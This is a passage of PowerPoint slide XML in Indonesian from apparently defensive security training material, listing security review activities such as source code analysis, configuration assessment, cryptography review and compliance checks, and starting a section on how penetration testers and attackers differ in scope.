              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Kode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengkodean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengungkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengkodean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengkodean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pedoman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relevan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tinjauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesenjangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemisahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jejak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dari </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perspektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> batas-batas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
